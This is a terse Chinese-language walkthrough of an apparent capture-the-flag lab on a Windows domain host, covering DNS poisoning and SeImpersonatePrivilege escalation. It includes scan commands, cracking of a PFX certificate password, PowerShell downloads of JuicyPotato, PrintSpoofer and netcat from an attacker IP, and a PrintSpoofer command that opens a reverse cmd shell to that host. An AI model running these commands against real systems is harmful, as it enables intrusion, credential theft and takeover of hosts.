本关讲的是个DNS投毒+SeImpersonatePrivilege提权

nmap -v –min-rate 10000 10.10.113.180 -p-

nmap -T4 -n -sC -sV -Pn 10.10.113.180 -p 53,80,88,135,139,389,443,445,464,593,636,2179,3268,3269,3389,5222,5223,5229,5262,5263,5269,5270,5275,5276,7070,7443,7777,9090,9091,9389,49667,49668,49669,49670,49671,49687,49699

firefox报错了,
👇扫扫目录

1
./gobuster dir -k -u https://fire.windcorp.thm  -q -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

PFX 文件

用工具暴力破解密码然后连接

1
2
3
4
5
6
crackpkcs12 -d /usr/share/wordlists/rockyou.txt  /home/kali/Downloads/cert.pfx

ganteng

openssl pkcs12 -in cert.pfx -info -noout 
openssl pkcs12 -in cert.pfx -info -nokeys

利用工具爆破证书 ,获得私钥👆
导出证书,crt和key

1
2
3
openssl pkcs12 -in cert.pfx -out selfservice.crt.pem -clcerts -nokeys

openssl pkcs12 -in cert.pfx -out selfservice.key.pem -nocerts -nodes

然后修改Responder.conf

1
!Angelus25!

提权

法一

上传文件下载
/home/kali/ppyy/tool/nc
JuicyPotato.exe nc64.exe PrintSpoofer64.exe

1
2
3
4
5
6
7
powershell -Command "Invoke-WebRequest -Uri 'http://10.11.132.105/JuicyPotato.exe' -OutFile 'C:\Users\edwardle.WINDCORP\Documents\JuicyPotato.exe'"

powershell -Command "Invoke-WebRequest -Uri 'http://10.11.132.105/PrintSpoofer64.exe' -OutFile 'C:\Users\edwardle.WINDCORP\Documents\PrintSpoofer64.exe'"

powershell -Command "Invoke-WebRequest -Uri 'http://10.11.132.105/nc64.exe' -OutFile 'C:\Users\edwardle.WINDCORP\Documents\nc64.exe'"

./PrintSpoofer64.exe -c "./nc64.exe 10.11.132.105 4444 -e cmd"

法二

SweetPotato

1
需要自己编译,懒得弄了

参考